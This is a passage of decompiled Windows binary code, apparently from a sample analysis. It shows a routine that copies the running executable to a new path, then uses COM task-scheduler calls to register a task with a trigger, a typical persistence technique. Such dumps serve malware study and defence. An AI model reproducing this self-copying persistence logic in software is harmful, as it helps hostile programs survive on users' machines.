                          				int _v88;
                          				int _v92;
                          				int _v96;
                          				void* _v100;
                          				int _v104;
                          				int _v108;
                          				signed int _v112;
                          				int _v116;
                          				signed int _v120;
                          				char _v121;
                          				char _v124;
                          				signed int _v128;
                          				int _v132;
                          				signed int _v136;
                          				int _v140;
                          				int _v144;
                          				char _v148;
                          				signed int _v152;
                          				short _v156;
                          				char _v160;
                          				signed int _v164;
                          				int _v168;
                          				char _v172;
                          				signed int _v180;
                          				short _v184;
                          				signed int _v188;
                          				intOrPtr _v192;
                          				signed int _v196;
                          				char _v204;
                          				signed int _v208;
                          				int _v212;
                          				char _v220;
                          				signed int _v228;
                          				signed int _v232;
                          				char _v252;
                          				char _v268;
                          				char _v276;
                          				int _v292;
                          				signed int _v296;
                          				intOrPtr _v308;
                          				short* _v624;
                          				char _v644;
                          				signed int _v648;
                          				char _v680;
                          				intOrPtr _v712;
                          				char _v716;
                          				short* _v724;
                          				short* _v756;
                          				signed int _v764;
                          				signed int* _v780;
                          				char _v796;
                          				intOrPtr _v800;
                          				char _v813;
                          				intOrPtr _v824;
                          				unsigned int _v828;
                          				intOrPtr _v836;
                          				intOrPtr _v848;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t560;
                          				signed int _t561;
                          				int _t563;
                          				void* _t569;
                          				signed int _t575;
                          				signed int _t578;
                          				void* _t583;
                          				signed int _t586;
                          				signed int _t588;
                          				signed int _t590;
                          				signed int _t602;
                          				intOrPtr _t607;
                          				signed int _t609;
                          				signed int _t610;
                          				intOrPtr _t612;
                          				signed int _t615;
                          				signed int _t630;
                          				int _t639;
                          				signed int _t642;
                          				signed int _t649;
                          				signed int _t650;
                          				intOrPtr _t657;
                          				signed int _t658;
                          				signed int _t666;
                          				signed int _t680;
                          				int _t683;
                          				signed int* _t690;
                          				short* _t701;
                          				void* _t708;
                          				int _t710;
                          				signed int _t720;
                          				void* _t733;
                          				signed int _t735;
                          				signed int _t744;
                          				signed int _t746;
                          				void* _t749;
                          				signed int _t750;
                          				signed int _t751;
                          				int _t761;
                          				signed int _t764;
                          				intOrPtr* _t769;
                          				signed int* _t770;
                          				signed int _t771;
                          				void* _t772;
                          				signed int _t775;
                          				signed int _t778;
                          				int _t781;
                          				signed int _t784;
                          				int _t785;
                          				int _t787;
                          				signed int _t790;
                          				signed int _t792;
                          				signed int _t795;
                          				signed int _t800;
                          				intOrPtr* _t806;
                          				signed int* _t807;
                          				signed int _t808;
                          				void* _t809;
                          				signed int _t811;
                          				signed int _t813;
                          				signed int _t815;
                          				intOrPtr* _t821;
                          				signed int* _t822;
                          				signed int _t823;
                          				void* _t824;
                          				int _t825;
                          				signed int _t826;
                          				signed int _t828;
                          				signed int _t830;
                          				int _t831;
                          				signed int _t834;
                          				signed int _t836;
                          				signed int _t839;
                          				intOrPtr* _t843;
                          				signed int* _t844;
                          				signed int _t845;
                          				void* _t846;
                          				signed int _t847;
                          				signed int _t849;
                          				signed int _t852;
                          				signed int _t853;
                          				signed int _t856;
                          				intOrPtr* _t858;
                          				signed int* _t859;
                          				signed int _t860;
                          				signed int _t867;
                          				signed int _t871;
                          				intOrPtr* _t876;
                          				intOrPtr* _t878;
                          				int _t880;
                          				signed int _t883;
                          				signed int _t884;
                          				signed int _t887;
                          				signed int _t888;
                          				int _t898;
                          				signed int _t900;
                          				signed int _t901;
                          				signed int _t910;
                          				signed int _t911;
                          				intOrPtr* _t914;
                          				signed int _t920;
                          				signed int _t921;
                          				signed int _t924;
                          				signed int _t925;
                          				signed int _t930;
                          				signed int _t931;
                          				signed int _t934;
                          				signed int _t935;
                          				void* _t945;
                          				void* _t947;
                          				signed int _t949;
                          				signed int _t950;
                          				signed int _t967;
                          				int _t974;
                          				int _t982;
                          				signed int _t987;
                          				signed int _t988;
                          				signed int _t990;
                          				char _t991;
                          				signed int _t995;
                          				unsigned int _t996;
                          				signed int _t1002;
                          				signed int _t1003;
                          				int _t1004;
                          				short* _t1012;
                          				intOrPtr* _t1013;
                          				intOrPtr* _t1015;
                          				intOrPtr* _t1016;
                          				intOrPtr* _t1017;
                          				intOrPtr* _t1018;
                          				intOrPtr* _t1020;
                          				intOrPtr* _t1023;
                          				intOrPtr* _t1024;
                          				int _t1025;
                          				intOrPtr* _t1026;
                          				intOrPtr* _t1028;
                          				intOrPtr* _t1029;
                          				intOrPtr* _t1030;
                          				intOrPtr* _t1036;
                          				intOrPtr* _t1037;
                          				int _t1038;
                          				intOrPtr* _t1039;
                          				int _t1040;
                          				signed int _t1043;
                          				signed int _t1049;
                          				signed int _t1050;
                          				intOrPtr* _t1051;
                          				void* _t1066;
                          				void* _t1068;
                          				signed int _t1071;
                          				intOrPtr _t1072;
                          				unsigned int _t1074;
                          				unsigned int _t1075;
                          				void* _t1098;
                          				void* _t1099;
                          				short* _t1100;
                          				intOrPtr* _t1103;
                          				signed int _t1104;
                          				short* _t1105;
                          				signed char* _t1107;
                          				int _t1109;
                          				intOrPtr _t1110;
                          				signed int _t1119;
                          				intOrPtr* _t1120;
                          				int _t1122;
                          				void* _t1123;
                          				void* _t1124;
                          				intOrPtr* _t1125;
                          				signed int _t1127;
                          				signed int _t1128;
                          				void* _t1129;
                          				signed char* _t1131;
                          				signed int _t1132;
                          				intOrPtr _t1133;
                          				intOrPtr _t1134;
                          				signed int _t1136;
                          				void* _t1138;
                          				signed int _t1141;
                          				void* _t1143;
                          				signed int _t1145;
                          				intOrPtr* _t1148;
                          				signed int _t1149;
                          				intOrPtr* _t1153;
                          				signed int _t1154;
                          				intOrPtr* _t1156;
                          				signed int _t1157;
                          				intOrPtr* _t1160;
                          				signed int _t1161;
                          				signed int _t1164;
                          				signed int _t1170;
                          				signed int _t1172;
                          				void* _t1174;
                          				void* _t1175;
                          				void* _t1185;
                          				signed int _t1188;
                          				void* _t1189;
                          				void* _t1194;
                          				void* _t1196;
                          				signed int _t1200;
                          				void* _t1201;
                          				void* _t1207;
                          				signed int _t1208;
                          				void* _t1210;
                          				void* _t1211;
                          				void* _t1214;
                          				void* _t1234;
                          
                          				_push(__ebx);
                          				_t945 = _t1185;
                          				_t1188 = (_t1185 - 0x00000008 & 0xfffffff8) + 4;
                          				_v8 =  *((intOrPtr*)(_t945 + 4));
                          				_t1164 = _t1188;
                          				_push(0xffffffff);
                          				_push(0x1365aeb);
                          				_push( *[fs:0x0]);
                          				_push(_t945);
                          				_t1189 = _t1188 - 0xa0;
                          				_t560 =  *0x13a4018; // 0x39cca9f6
                          				_t561 = _t560 ^ _t1164;
                          				_v32 = _t561;
                          				_push(__edi);
                          				_push(_t561);
                          				 *[fs:0x0] =  &_v24;
                          				_t1122 =  *((intOrPtr*)(_t945 + 8));
                          				_t563 =  *((intOrPtr*)(_t945 + 0xc));
                          				_v132 = _t1122;
                          				_v132 = _t563;
                          				_v64 = 0;
                          				_v60 = 7;
                          				_v80 = 0;
                          				_v16 = 0;
                          				if( *((intOrPtr*)(_t563 + 0x10)) == 0) {
                          					L25:
                          					asm("movups xmm0, [ebp-0x44]");
                          					 *(_t1122 + 0x10) = 0;
                          					 *(_t1122 + 0x14) = 0;
                          					asm("movups [esi], xmm0");
                          					asm("movq xmm0, [ebp-0x34]");
                          					asm("movq [esi+0x10], xmm0");
                          					 *[fs:0x0] = _v24;
                          					_pop(_t1123);
                          					return E0132EA79(_v32 ^ _t1164, _t1123);
                          				} else {
                          					_v40 = 0;
                          					_v36 = 7;
                          					_v56 = 0;
                          					_t1066 = E012F57D0(_t945, __edx, __edi, 0x210);
                          					_v40 = 0x104;
                          					_v36 = 0x107;
                          					_t1098 = _t1066;
                          					_v136 = _t1066;
                          					_t569 = memset(_t1098, 0, 0x82 << 2);
                          					_t1099 = _t1098 + 0x82;
                          					 *(_t1066 + 0x208) = _t569;
                          					E012F5760( &_v56,  &_v136);
                          					_t1194 = _t1189 + 0x18;
                          					_v16 = 1;
                          					_t574 =  >=  ? _v56 :  &_v56;
                          					_t575 = GetModuleFileNameW(0,  >=  ? _v56 :  &_v56, _v40);
                          					if(_t575 == 0) {
                          						__eflags = _v36 - 8;
                          						_v40 = 0;
                          						_t577 =  >=  ? _v56 :  &_v56;
                          						__eflags = 0;
                          						 *( >=  ? _v56 :  &_v56) = 0;
                          					} else {
                          						_t1061 = _v40;
                          						if(_t575 > _v40) {
                          							E012F6190(_t945,  &_v56, _t1099, _t575 - _t1061, 0);
                          						} else {
                          							_v40 = _t575;
                          							_t1064 =  >=  ? _v56 :  &_v56;
                          							( >=  ? _v56 :  &_v56)[_t575] = 0;
                          						}
                          					}
                          					asm("movups xmm0, [ebp-0x2c]");
                          					asm("movups [ebp-0x5c], xmm0");
                          					asm("movq xmm0, [ebp-0x1c]");
                          					asm("movq [ebp-0x4c], xmm0");
                          					_v16 = 2;
                          					_t1100 = _v40;
                          					if(_t1100 == 0) {
                          						L23:
                          						_t578 = _v84;
                          						if(_t578 >= 8) {
                          							_push(2 + _t578 * 2);
                          							E012F56A0(_t945, _t1100, _v104);
                          						}
                          						goto L25;
                          					} else {
                          						_v112 = 0;
                          						_v108 = 7;
                          						_v128 = 0;
                          						_push(_v132);
                          						_v16 = 3;
                          						_t967 =  >=  ? _v56 :  &_v104;
                          						_t1068 = E012F86C0(_t945, _t967, _t1100, _t1100, _t967, "\\", 1);
                          						_t1196 = _t1194 + 0x10;
                          						if(_t1068 == 0xffffffff) {
                          							asm("movq xmm1, [ebp-0x64]");
                          							asm("movups xmm0, [ebp-0x74]");
                          							L11:
                          							asm("movups [ebp-0x94], xmm0");
                          							asm("movq [ebp-0x84], xmm1");
                          							_push("\\");
                          							_v16 = 4;
                          							_t583 = E012FC400(_t945,  &_v184, _v132, _t1100);
                          							_v16 = 5;
                          							_t1100 = E012FC470( &_v56, _t583,  &_v160);
                          							_t1194 = _t1196 + 8;
                          							if( &_v80 != _t1100) {
                          								_t602 = _v60;
                          								if(_t602 >= 8) {
                          									_push(2 + _t602 * 2);
                          									E012F56A0(_t945, _t1100, _v80);
                          									_t1194 = _t1194 + 8;
                          								}
                          								_v64 = 0;
                          								_v60 = 7;
                          								_v80 = 0;
                          								asm("movups xmm0, [edi]");
                          								asm("movups [ebp-0x44], xmm0");
                          								asm("movq xmm0, [edi+0x10]");
                          								asm("movq [ebp-0x34], xmm0");
                          								 *((intOrPtr*)(_t1100 + 0x10)) = 0;
                          								 *(_t1100 + 0x14) = 7;
                          								 *_t1100 = 0;
                          							}
                          							_t586 = _v36;
                          							if(_t586 >= 8) {
                          								_push(2 + _t586 * 2);
                          								E012F56A0(_t945, _t1100, _v56);
                          								_t1194 = _t1194 + 8;
                          							}
                          							_v40 = 0;
                          							_v56 = 0;
                          							_t588 = _v164;
                          							_v36 = 7;
                          							if(_t588 >= 8) {
                          								_push(2 + _t588 * 2);
                          								E012F56A0(_t945, _t1100, _v184);
                          								_t1194 = _t1194 + 8;
                          							}
                          							_v168 = 0;
                          							_v184 = 0;
                          							_t590 = _v140;
                          							_v164 = 7;
                          							if(_t590 >= 8) {
                          								_push(2 + _t590 * 2);
                          								E012F56A0(_t945, _t1100, _v160);
                          								_t1194 = _t1194 + 8;
                          							}
                          							_t972 =  >=  ? _v80 :  &_v80;
                          							_t592 =  >=  ? _v104 :  &_v104;
                          							if(CopyFileW( >=  ? _v104 :  &_v104,  >=  ? _v80 :  &_v80, 0) == 0) {
                          								_v64 = 0;
                          								_t595 =  >=  ? _v80 :  &_v80;
                          								 *( >=  ? _v80 :  &_v80) = 0;
                          							}
                          							goto L23;
                          						} else {
                          							_t1071 = _t1068 + 1;
                          							_v144 = 0;
                          							_v140 = 7;
                          							_v160 = 0;
                          							if(_t1100 < _t1071) {
                          								_t607 = E012F8000(_t945, _t967, _t1071, _t1100);
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								asm("int3");
                          								_push(_t1164);
                          								_t1072 = _v192;
                          								__eflags =  *(_t1072 + 0x10);
                          								if( *(_t1072 + 0x10) == 0) {
                          									L30:
                          									return _t607;
                          								} else {
                          									_t607 = _v4;
                          									__eflags =  *(_t607 + 0x10);
                          									if( *(_t607 + 0x10) == 0) {
                          										goto L30;
                          									} else {
                          										_v4 = _t607;
                          										_v8 = _t1072;
                          										_pop(_t1168);
                          										_push(_t945);
                          										_t947 = _t1196;
                          										_t1200 = (_t1196 - 0x00000008 & 0xfffffff8) + 4;
                          										_v204 =  *((intOrPtr*)(_t947 + 4));
                          										_t1170 = _t1200;
                          										_push(0xffffffff);
                          										_push(0x13662bc);
                          										_push( *[fs:0x0]);
                          										_push(_t947);
                          										_t1201 = _t1200 - 0xe8;
                          										_t609 =  *0x13a4018; // 0x39cca9f6
                          										_t610 = _t609 ^ _t1170;
                          										_v228 = _t610;
                          										_push(_t1122);
                          										_push(_t1100);
                          										_push(_t610);
                          										 *[fs:0x0] =  &_v220;
                          										_t612 =  *((intOrPtr*)(_t947 + 8));
                          										_t974 =  *(_t947 + 0xc);
                          										_t1073 =  *(_t947 + 0x10);
                          										_v308 = _t612;
                          										__eflags =  *(_t612 + 0x10);
                          										_v292 = _t974;
                          										_v296 = _t1073;
                          										if( *(_t612 + 0x10) == 0) {
                          											L100:
                          											__eflags = 0;
                          											goto L101;
                          										} else {
                          											__eflags = _t1073;
                          											if(_t1073 == 0) {
                          												goto L100;
                          											} else {
                          												__eflags =  *(_t974 + 0x10);
                          												if( *(_t974 + 0x10) == 0) {
                          													goto L100;
                          												} else {
                          													__imp__CoInitializeEx(0, 0);
                          													__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0);
                          													_t615 =  &_v60;
                          													_v60 = 0;
                          													__imp__CoCreateInstance(0x1378f5c, 0, 1, 0x1378f4c, _t615);
                          													__eflags = _t615;
                          													if(_t615 < 0) {
                          														goto L100;
                          													} else {
                          														_t1125 = __imp__#8;
                          														 *_t1125( &_v268);
                          														_v32 = 0;
                          														asm("movups xmm0, [ebp-0xf0]");
                          														asm("movups [ebp-0xd8], xmm0");
                          														 *_t1125( &_v172);
                          														asm("movups xmm0, [ebp-0x90]");
                          														asm("movups [ebp-0xc0], xmm0");
                          														 *_t1125( &_v188);
                          														asm("movups xmm0, [ebp-0xa0]");
                          														asm("movups [ebp-0x78], xmm0");
                          														 *_t1125( &_v204);
                          														_v32 = 3;
                          														asm("movups xmm0, [ebp-0xd8]");
                          														asm("movups [eax], xmm0");
                          														asm("movups xmm0, [ebp-0xc0]");
                          														asm("movups [eax], xmm0");
                          														_t1207 = _t1201 - 0xffffffffffffffe0;
                          														asm("movups xmm0, [ebp-0x78]");
                          														asm("movups [eax], xmm0");
                          														asm("movups xmm0, [ebp-0xb0]");
                          														asm("movups [eax], xmm0");
                          														_t630 =  *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x28))))(_v60);
                          														_t1103 = __imp__#9;
                          														_t1126 = _t630;
                          														 *_t1103( &_v204);
                          														 *_t1103( &_v188);
                          														 *_t1103( &_v172);
                          														_v32 = 0xffffffff;
                          														 *_t1103( &_v268);
                          														_t639 = _v60;
                          														__eflags = _t630;
                          														if(__eflags < 0) {
                          															L99:
                          															 *((intOrPtr*)( *_t639 + 8))(_t639);
                          															goto L100;
                          														} else {
                          															_v56 = 0;
                          															_t1104 =  *( *_t639 + 0x1c);
                          															_t642 = E0132EA8A(_t1126, __eflags, 0xc);
                          															_t1127 = _t642;
                          															_t1208 = _t1207 + 4;
                          															_v108 = _t1127;
                          															_v32 = 4;
                          															__eflags = _t1127;
                          															if(_t1127 == 0) {
                          																_t1127 = 0;
                          																__eflags = 0;
                          																goto L40;
                          															} else {
                          																asm("xorps xmm0, xmm0");
                          																asm("movq [esi], xmm0");
                          																 *(_t1127 + 8) = 0;
                          																 *(_t1127 + 4) = 0;
                          																 *(_t1127 + 8) = 1;
                          																__imp__#2("\\");
                          																 *_t1127 = _t642;
                          																__eflags = _t642;
                          																if(_t642 == 0) {
                          																	L189:
                          																	E0132FAD0(0x8007000e);
                          																	goto L190;
                          																} else {
                          																	L40:
                          																	_v32 = 0xffffffff;
                          																	_v108 = _t1127;
                          																	__eflags = _t1127;
                          																	if(_t1127 == 0) {
                          																		goto L189;
                          																	} else {
                          																		_v32 = 5;
                          																		_t764 =  *_t1104(_v60,  *_t1127,  &_v56);
                          																		__eflags = _t764;
                          																		_v32 = 0xffffffff;
                          																		_v121 = _t764 < 0;
                          																		_t1104 = _t1104 | 0xffffffff;
                          																		asm("lock xadd [esi+0x8], eax");
                          																		__eflags = _t1104 == 1;
                          																		if(_t1104 == 1) {
                          																			_t934 =  *_t1127;
                          																			__eflags = _t934;
                          																			if(_t934 != 0) {
                          																				__imp__#6(_t934);
                          																				 *_t1127 = 0;
                          																			}
                          																			_t935 =  *(_t1127 + 4);
                          																			__eflags = _t935;
                          																			if(_t935 != 0) {
                          																				L0132ECE6(_t935);
                          																				_t1208 = _t1208 + 4;
                          																				 *(_t1127 + 4) = 0;
                          																			}
                          																			_push(0xc);
                          																			E0132EABA(_t1127);
                          																			_t1208 = _t1208 + 8;
                          																		}
                          																		__eflags = _v121;
                          																		if(_v121 == 0) {
                          																			_t1148 =  *((intOrPtr*)( *_v56 + 0x3c));
                          																			_t769 = _v128;
                          																			_t1013 = _t769;
                          																			__eflags =  *((intOrPtr*)(_t769 + 0x14)) - 8;
                          																			if(__eflags >= 0) {
                          																				_t1013 =  *_t769;
                          																			}
                          																			_t770 = E012F9580( &_v108, __eflags, _t1013);
                          																			_v32 = 6;
                          																			_t771 =  *_t770;
                          																			__eflags = _t771;
                          																			if(_t771 == 0) {
                          																				_t772 = 0;
                          																				__eflags = 0;
                          																			} else {
                          																				_t772 =  *_t771;
                          																			}
                          																			 *_t1148(_v56, _t772, 0);
                          																			_v32 = 0xffffffff;
                          																			_t1149 = _v108;
                          																			__eflags = _t1149;
                          																			if(_t1149 != 0) {
                          																				asm("lock xadd [esi+0x8], eax");
                          																				__eflags = _t1104 == 1;
                          																				if(_t1104 == 1) {
                          																					__eflags = _t1149;
                          																					if(_t1149 != 0) {
                          																						_t930 =  *_t1149;
                          																						__eflags = _t930;
                          																						if(_t930 != 0) {
                          																							__imp__#6(_t930);
                          																							 *_t1149 = 0;
                          																						}
                          																						_t931 =  *(_t1149 + 4);
                          																						__eflags = _t931;
                          																						if(_t931 != 0) {
                          																							L0132ECE6(_t931);
                          																							_t1208 = _t1208 + 4;
                          																							 *(_t1149 + 4) = 0;
                          																						}
                          																						_push(0xc);
                          																						E0132EABA(_t1149);
                          																						_t1208 = _t1208 + 8;
                          																					}
                          																				}
                          																			}
                          																			_t1015 = _v60;
                          																			_v52 = 0;
                          																			_t775 =  *((intOrPtr*)( *_t1015 + 0x24))(_t1015, 0,  &_v52);
                          																			_t1016 = _v60;
                          																			 *((intOrPtr*)( *_t1016 + 8))(_t1016);
                          																			__eflags = _t775;
                          																			if(_t775 >= 0) {
                          																				_t1017 = _v52;
                          																				_v76 = 0;
                          																				_t778 =  *((intOrPtr*)( *_t1017 + 0x3c))(_t1017,  &_v76);
                          																				__eflags = _t778;
                          																				if(_t778 < 0) {
                          																					goto L63;
                          																				} else {
                          																					_t1018 = _v76;
                          																					 *((intOrPtr*)( *_t1018 + 0x48))(_t1018, 1);
                          																					_t781 = _v76;
                          																					 *((intOrPtr*)( *_t781 + 8))(_t781);
                          																					_t1020 = _v52;
                          																					_v96 = 0;
                          																					_t784 =  *((intOrPtr*)( *_t1020 + 0x1c))(_t1020,  &_v96);
                          																					__eflags = _t784;
                          																					if(_t784 < 0) {
                          																						L142:
                          																						_t785 = _v56;
                          																						goto L98;
                          																					} else {
                          																						_t787 = _v96;
                          																						 *((intOrPtr*)( *_t787 + 8))(_t787);
                          																						_t1023 = _v52;
                          																						_v80 = 0;
                          																						_t790 =  *((intOrPtr*)( *_t1023 + 0x24))(_t1023,  &_v80);
                          																						__eflags = _t790;
                          																						if(_t790 < 0) {
                          																							goto L142;
                          																						} else {
                          																							_t1024 = _v80;
                          																							_v84 = 0;
                          																							_t792 =  *((intOrPtr*)( *_t1024 + 0x28))(_t1024, 2,  &_v84);
                          																							_t1025 = _v80;
                          																							 *((intOrPtr*)( *_t1025 + 8))(_t1025);
                          																							__eflags = _t792;
                          																							if(_t792 < 0) {
                          																								goto L142;
                          																							} else {
                          																								_t1026 = _v84;
                          																								_v64 = 0;
                          																								_t795 =  *((intOrPtr*)( *_t1026))(_t1026, 0x1378f3c,  &_v64);
                          																								_t974 = _v84;
                          																								_t1152 = _t795;
                          																								_t1073 =  *_t974;
                          																								 *((intOrPtr*)( *_t974 + 8))(_t974);
                          																								__eflags = _t795;
                          																								if(__eflags < 0) {
                          																									goto L142;
                          																								} else {
                          																									_v108 =  *((intOrPtr*)( *_v64 + 0x24));
                          																									_t800 = E0132EA8A(_t1152, __eflags, 0xc);
                          																									_t1127 = _t800;
                          																									_t1208 = _t1208 + 4;
                          																									_v120 = _t1127;
                          																									_v32 = 7;
                          																									__eflags = _t1127;
                          																									if(_t1127 == 0) {
                          																										_t1127 = 0;
                          																										__eflags = 0;
                          																										goto L73;
                          																									} else {
                          																										asm("xorps xmm0, xmm0");
                          																										asm("movq [esi], xmm0");
                          																										 *(_t1127 + 8) = 0;
                          																										 *(_t1127 + 4) = 0;
                          																										 *(_t1127 + 8) = 1;
                          																										__imp__#2(L"Trigger1");
                          																										 *_t1127 = _t800;
                          																										__eflags = _t800;
                          																										if(_t800 == 0) {
                          																											L190:
                          																											E0132FAD0(0x8007000e);
                          																											goto L191;
                          																										} else {
                          																											L73:
                          																											_v32 = 0xffffffff;
                          																											_v120 = _t1127;
                          																											__eflags = _t1127;
                          																											if(_t1127 == 0) {
                          																												goto L189;
                          																											} else {
                          																												_v32 = 8;
                          																												_v108(_v64,  *_t1127);
                          																												_v32 = 0xffffffff;
                          																												asm("lock xadd [esi+0x8], eax");
                          																												__eflags = _t1104 == 1;
                          																												if(_t1104 == 1) {
                          																													_t924 =  *_t1127;
                          																													__eflags = _t924;
                          																													if(_t924 != 0) {
                          																														__imp__#6(_t924);
                          																														 *_t1127 = 0;
                          																													}
                          																													_t925 =  *(_t1127 + 4);
                          																													__eflags = _t925;
                          																													if(_t925 != 0) {
                          																														L0132ECE6(_t925);
                          																														_t1208 = _t1208 + 4;
                          																														 *(_t1127 + 4) = 0;
                          																													}
                          																													_push(0xc);
                          																													E0132EABA(_t1127);
                          																													_t1208 = _t1208 + 8;
                          																												}
                          																												_push(_t974);
                          																												_t1153 =  *((intOrPtr*)( *_v64 + 0x3c));
                          																												_t806 =  &_v156;
                          																												_push(_t806);
                          																												L194();
                          																												_v32 = 9;
                          																												__eflags =  *((intOrPtr*)(_t806 + 0x14)) - 8;
                          																												if(__eflags >= 0) {
                          																													_t806 =  *_t806;
                          																												}
                          																												_t807 = E012F9580( &_v108, __eflags, _t806);
                          																												_v32 = 0xa;
                          																												_t808 =  *_t807;
                          																												__eflags = _t808;
                          																												if(_t808 == 0) {
                          																													_t809 = 0;
                          																													__eflags = 0;
                          																												} else {
                          																													_t809 =  *_t808;
                          																												}
                          																												 *_t1153(_v64, _t809);
                          																												_t1154 = _v108;
                          																												__eflags = _t1154;
                          																												if(_t1154 != 0) {
                          																													asm("lock xadd [esi+0x8], eax");
                          																													__eflags = _t1104 == 1;
                          																													if(_t1104 == 1) {
                          																														__eflags = _t1154;
                          																														if(_t1154 != 0) {
                          																															_t920 =  *_t1154;
                          																															__eflags = _t920;
                          																															if(_t920 != 0) {
                          																																__imp__#6(_t920);
                          																																 *_t1154 = 0;
                          																															}
                          																															_t921 =  *(_t1154 + 4);
                          																															__eflags = _t921;
                          																															if(_t921 != 0) {
                          																																L0132ECE6(_t921);
                          																																_t1208 = _t1208 + 4;
                          																																 *(_t1154 + 4) = 0;
                          																															}
                          																															_push(0xc);
                          																															E0132EABA(_t1154);
                          																															_t1208 = _t1208 + 8;
                          																														}
                          																													}
                          																													_v108 = 0;
                          																												}
                          																												_v32 = 0xffffffff;
                          																												_t811 = _v136;
                          																												__eflags = _t811 - 8;
                          																												if(_t811 >= 8) {
                          																													_push(2 + _t811 * 2);
                          																													E012F56A0(_t947, _t1104, _v156);
                          																													_t1208 = _t1208 + 8;
                          																												}
                          																												_t1028 = _v64;
                          																												_t813 =  *((intOrPtr*)( *_t1028 + 0x54))(_t1028, 1);
                          																												__eflags = _t813;
                          																												if(_t813 >= 0) {
                          																													_t1029 = _v64;
                          																													_v68 = 0;
                          																													_t815 =  *((intOrPtr*)( *_t1029 + 0x28))(_t1029,  &_v68);
                          																													_t1030 = _v64;
                          																													 *((intOrPtr*)( *_t1030 + 8))(_t1030);
                          																													__eflags = _t815;
                          																													if(_t815 < 0) {
                          																														goto L142;
                          																													} else {
                          																														_t1156 =  *((intOrPtr*)( *_v68 + 0x20));
                          																														E012F8010(_t947,  &_v276, _v116, _t1104);
                          																														asm("movups xmm0, [ebp-0xf8]");
                          																														asm("movups [ebp-0xe0], xmm0");
                          																														asm("movq xmm0, [ebp-0xe8]");
                          																														asm("movq [ebp-0xd0], xmm0");
                          																														_v32 = 0xb;
                          																														_push( &_v252);
                          																														L249();
                          																														_v32 = 0xc;
                          																														_t821 = E012F8470( &_v156,  &_v252, "M");
                          																														_t1208 = _t1208 + 8;
                          																														_v32 = 0xd;
                          																														__eflags =  *((intOrPtr*)(_t821 + 0x14)) - 8;
                          																														if(__eflags >= 0) {
                          																															_t821 =  *_t821;
                          																														}
                          																														_t822 = E012F9580( &_v108, __eflags, _t821);
                          																														_v32 = 0xe;
                          																														_t823 =  *_t822;
                          																														__eflags = _t823;
                          																														if(_t823 == 0) {
                          																															_t824 = 0;
                          																															__eflags = 0;
                          																														} else {
                          																															_t824 =  *_t823;
                          																														}
                          																														_t825 =  *_t1156(_v68, _t824);
                          																														_t1157 = _v108;
                          																														_v116 = _t825;
                          																														__eflags = _t1157;
                          																														if(_t1157 != 0) {
                          																															asm("lock xadd [esi+0x8], ecx");
                          																															__eflags = _t1104 == 1;
                          																															if(_t1104 == 1) {
                          																																__eflags = _t1157;
                          																																if(_t1157 != 0) {
                          																																	_t910 =  *_t1157;
                          																																	__eflags = _t910;
                          																																	if(_t910 != 0) {
                          																																		__imp__#6(_t910);
                          																																		 *_t1157 = 0;
                          																																	}
                          																																	_t911 =  *(_t1157 + 4);
                          																																	__eflags = _t911;
                          																																	if(_t911 != 0) {
                          																																		L0132ECE6(_t911);
                          																																		_t1208 = _t1208 + 4;
                          																																		 *(_t1157 + 4) = 0;
                          																																	}
                          																																	_push(0xc);
                          																																	E0132EABA(_t1157);
                          																																	_t1208 = _t1208 + 8;
                          																																}
                          																															}
                          																															_v108 = 0;
                          																														}
                          																														_t826 = _v136;
                          																														__eflags = _t826 - 8;
                          																														if(_t826 >= 8) {
                          																															_push(2 + _t826 * 2);
                          																															E012F56A0(_t947, _t1104, _v156);
                          																															_t1208 = _t1208 + 8;
                          																														}
                          																														_v140 = 0;
                          																														_v156 = 0;
                          																														_t828 = _v208;
                          																														_v136 = 7;
                          																														__eflags = _t828 - 8;
                          																														if(_t828 >= 8) {
                          																															_push(2 + _t828 * 2);
                          																															E012F56A0(_t947, _t1104, _v228);
                          																															_t1208 = _t1208 + 8;
                          																														}
                          																														_v32 = 0xffffffff;
                          																														_v228 = 0;
                          																														_t830 = _v232;
                          																														_v212 = 0;
                          																														_v208 = 7;
                          																														__eflags = _t830 - 8;
                          																														if(_t830 >= 8) {
                          																															_push(2 + _t830 * 2);
                          																															E012F56A0(_t947, _t1104, _v252);
                          																															_t1208 = _t1208 + 8;
                          																														}
                          																														_t831 = _v68;
                          																														 *((intOrPtr*)( *_t831 + 8))(_t831);
                          																														__eflags = _v116;
                          																														if(_v116 < 0) {
                          																															goto L142;
                          																														} else {
                          																															_t1036 = _v52;
                          																															_v88 = 0;
                          																															_t834 =  *((intOrPtr*)( *_t1036 + 0x44))(_t1036,  &_v88);
                          																															__eflags = _t834;
                          																															if(_t834 < 0) {
                          																																goto L142;
                          																															} else {
                          																																_t1037 = _v88;
                          																																_v92 = 0;
                          																																_t836 =  *((intOrPtr*)( *_t1037 + 0x30))(_t1037, 0,  &_v92);
                          																																_t1038 = _v88;
                          																																 *((intOrPtr*)( *_t1038 + 8))(_t1038);
                          																																__eflags = _t836;
                          																																if(_t836 < 0) {
                          																																	goto L142;
                          																																} else {
                          																																	_t1039 = _v92;
                          																																	_v72 = 0;
                          																																	_t839 =  *((intOrPtr*)( *_t1039))(_t1039, 0x1378f6c,  &_v72);
                          																																	_t1040 = _v92;
                          																																	 *((intOrPtr*)( *_t1040 + 8))(_t1040);
                          																																	__eflags = _t839;
                          																																	if(_t839 < 0) {
                          																																		goto L142;
                          																																	} else {
                          																																		_t1160 =  *((intOrPtr*)( *_v72 + 0x2c));
                          																																		_t843 = _v112;
                          																																		__eflags =  *((intOrPtr*)(_t843 + 0x14)) - 8;
                          																																		if(__eflags >= 0) {
                          																																			_t843 =  *_t843;
                          																																		}
                          																																		_t844 = E012F9580( &_v112, __eflags, _t843);
                          																																		_v32 = 0xf;
                          																																		_t845 =  *_t844;
                          																																		__eflags = _t845;
                          																																		if(_t845 == 0) {
                          																																			_t846 = 0;
                          																																			__eflags = 0;
                          																																		} else {
                          																																			_t846 =  *_t845;
                          																																		}
                          																																		_t847 =  *_t1160(_v72, _t846);
                          																																		_v32 = 0xffffffff;
                          																																		_t1127 = _v112;
                          																																		_v116 = _t847;
                          																																		__eflags = _t1127;
                          																																		if(_t1127 != 0) {
                          																																			asm("lock xadd [esi+0x8], ecx");
                          																																			__eflags = _t1104 == 1;
